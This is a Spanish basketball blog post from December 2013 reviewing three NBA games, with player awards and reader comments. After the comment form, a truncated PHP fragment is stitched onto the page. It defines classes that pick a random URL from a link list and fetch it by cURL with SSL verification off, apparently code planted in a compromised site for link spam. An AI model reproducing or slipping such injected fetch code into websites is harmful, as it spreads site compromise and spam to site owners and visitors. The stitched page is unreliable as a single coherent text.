La Crónica: Popurrí de bajas

06 de December de 2013 por TheDeerHunter

Las jornadas de jueves noche suelen ser escuetas pero interesantes, únicamente con buenos partidos programados. Anoche, sin embargo, terminó siendo una buena ocasión para reservar horas de sueño de cara a otras guerras. Emoción escasa en choques desangelados. Con lo que había anoche lesionado se podría construir todo un campeón NBA.

Había derbi en la Gran Manzana. Los “hazmereir” Knicks visitaban a los patéticos Nets en lo que en otros lugares sería un duelo directo por evitar el descenso. Con las ausencias conocidas (Deron, Pierce, AK, Tyson Chandler, Reggie Evans) ya da para comenzar a diseñar un prometedor quinteto. En la pista poca historia. Un notable Melo, menos acaparador que en otras ocasiones, fue el mejor en el más que digno rendimiento colectivo de su equipo. Los Nets, una banda. El único potable fue Brook Lopez y, luego hay que dar de comer aparte a Garnett que lo único positivo que hizo fue hacer expulsar a Bargnani en una de sus broncas. Yo de Kidd iría encargando turrón del bueno para degustarlo tranquilamente en su casa.

Después pretendíamos asistir al, apriori,  choque más interesante de la noche. Entre los Grizzlies y los Clippers se ha creado una rivalidad muy particular los últimos tiempos. De este partido podríamos añadir a Marc, Tony Allen, Matt Barnes y Jj Redick a nuestro imaginario equipo campeón. Tampoco hubo partido, aunque al menos los Grizzlies aguantaron la primera parte. Victoria nº 600 de Doc Rivers. Buena actuación de la segunda unidad de los Clippers.

Finalmente los campeones visitaban una de sus plazas malditas, Chicago. Aquí añadiremos a nuestro dream team de bajas, cómo no, a Derrick Rose, pero también a Jimmy Butler, Dwyane Wade (enfermo) y a “Birdman”, baja de última hora por razones personales. La zona de los Heat, con Bosh de 5 y LeBron de 4 fue arrasada por los Hunos (Boozer, Noah y Taj Gibson) mientras que Deng aprovechaba una noche de relax sin “el bicho” encima. Por Miami los mejores fueron Beasley y Cole, con eso se dice todo. ¿Se ha extendido la crisis del Este también a ellos?

PREMIOS

MVP: Por un lado Carmelo Anthony, lanzando únicamente 12 veces a canasta y dejando jugar a los demás. 19 puntos, 10 rebotes y 6 asistencias en 31 minutos. Por el otro la tríada interior de los Bulls que atrapó 30 rebotes (3 más que todo el equipo rival) y anotó 63 puntos.

Rookie: Interesante rol que le ha tocado defender al “bull” Tony Snell de titular durante las últimas jornadas y 12 puntitos en 19 minutos para Tim Hardaway Jr.

Sorpresa: Gente que teníamos bastante olvidada. Buenas actuaciones tanto de Amare Stoudemire como de Antawn Jamison. El buen rendimiento de Michael Beasley está dejando de ser sorpresa.

Decepción: Hablábamos ayer de ellos y de sus glorias pasadas. Pésimo Kevin Garnett y no excesivamente mejor Chris Bosh (que sólo tiene 29, ojo) aunque ni es pívot ni se ha caracterizado nunca por ser un excelso reboteador.

Esfuerzo en vano: Brook Lopez, único hombre aprovechable en el erial que son ahora mismo los Brooklyn Nets. 24 puntos, 9 rebotes, 1 tapón, 1 asistencia y 1 robo.

Comenta

10 comentarios a esta entrada

  1. Denise dice:
    #1

    Pensaba que estariais de puente y no iba a haber cronica hoy.

    Pego mi comentario en la entrada correcta.

    Bueno, paliza de 30 de Knicks a Nets, que van camino de superar el ridiculo espantoso de los Lakers del año pasado. No sé a que esperan para destituir a Kidd.

    Sensacional segunda mitad de Clippers ante los Grizzlies, hasta el descanso, partido igualadisimo. Lástima lo de Ed Davis, en los ultimos 3 partidos estaba promediando 14 puntos y 9 rebotes en unos 27 minutos de juego. Ayer en 7 minutos, llevaba 6 puntos, 2 rebotes y 1 tapon hasta que se torció el tobillo y no puedo reaparecer por la cancha.
    Magnifico el banquillo de Clippers, hay que decir que a principios del ultimo cuarto, Koufos mete 4 puntos consecutivos para poner a los Grizzlies a 7, y en ese momento con Paul y Griffin en la banca, y entre Crawford, Collison, el rookie Reggie Bullock y Jamison meten 35 de los 37 puntos que los Clippers anotaron en el ultimo cuarto.

    En el otro partido, palizón de Bulls a unos Heat sin Wade. El trio interior Boozer-Noah-Gibson se zampó a Bosh y cia y entre los 3 combinaron 63 puntos y 32 rebotes. La diferencia en el rebote fue de 49-27 para Chicago

      Citar

  2. TheDeerHunter dice:
    #2

    te borro el anterior, si no te importa

      Citar

  3. Denise dice:
    #3

    A estas alturas, ese quinteto ( Deron, Pierce, AK, Tyson Chandler, Reggie Evans) creo que tiene mucho mas nombre que juego.

    Por otra parte, pesimo teatro, flopping o como sea de Blake Griffin ante Bayless. Con lo fuertote que es el pelirrojo no puede salir despedido de forma natural ante un empujoncito de un tio unos 15 cms mas bajo que él. Espero una sanción por parte de Stern.

      Citar

  4. Nacho dice:
    #4

    Deer, se coló una H voladora en iría.

      Citar

  5. Nacho dice:
    #5

    Si como yo, Sancho, lees a diario el blog, y no comentas, que sepas que algunos te echamos de menos. Distinto es que yo me calle, a que te calles tú. Vuelve a escribir de vez en cuando.

      Citar

  6. TheDeerHunter dice:
    #6

    Nacho:
    Deer, se coló una H voladora en iría.

    Incomprensible. Thanks. XD XD XD

      Citar

  7. txusma dice:
    #7

    Nacho:
    Si como yo, Sancho, lees a diario el blog, y no comentas, que sepas que algunos te echamos de menos. Distinto es que yo me calle, a que te calles tú. Vuelve a escribir de vez en cuando.

    Creo q es el mejor momento para anunciar que el gran Sancho ha tenido una hija preciosa. Su no presencia por el blog está justificada. De momento… 😀

      Citar

  8. Ruxixón dice:
    #8

    La colección de rondas que tiene empaquetado Nets con distintos destinos y los contratos de JoJo y Deron invitan a pegarse un tiro a cualquier aficionado del equipo si siguen contando con Kidd de entrenador.Erré totalmente con la proyección del que era base de los Knicks hace un año a cargo de un banquillo…una decepción total y es que no da ni el pego durante los partidos,la mayoría de minutos en la silla y sin el mas mínimo aspaviento.Luego durante el partido salio una estadística de los tercer cuarto de Brooklyn e invita a pensar que en ese vestuario 0 voces y 0 química.Vamos,que Kidd está ahí de florero,llevándoselo puesto.102 millones en salarios gestionados de esa manera…

      Citar

  9. HisRoyalAirness dice:
    #9

    txusma: Creo q es el mejor momento para anunciar que el gran Sancho ha tenido una hija preciosa. Su no presencia por el blog está justificada. De momento…

    Enhorabuena artista!!

      Citar

  10. Blade Petrovic dice:
    #10

    txusma: Creo q es el mejor momento para anunciar que el gran Sancho ha tenido una hija preciosa. Su no presencia por el blog está justificada. De momento…

    Hablando de gente que no comenta mucho, que ha sido de Sergio, el mítico autor de entre otros grandes posts el de Kareem Abdul-Jabbar, ganchos y gafas.Ojala vuelva pronto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>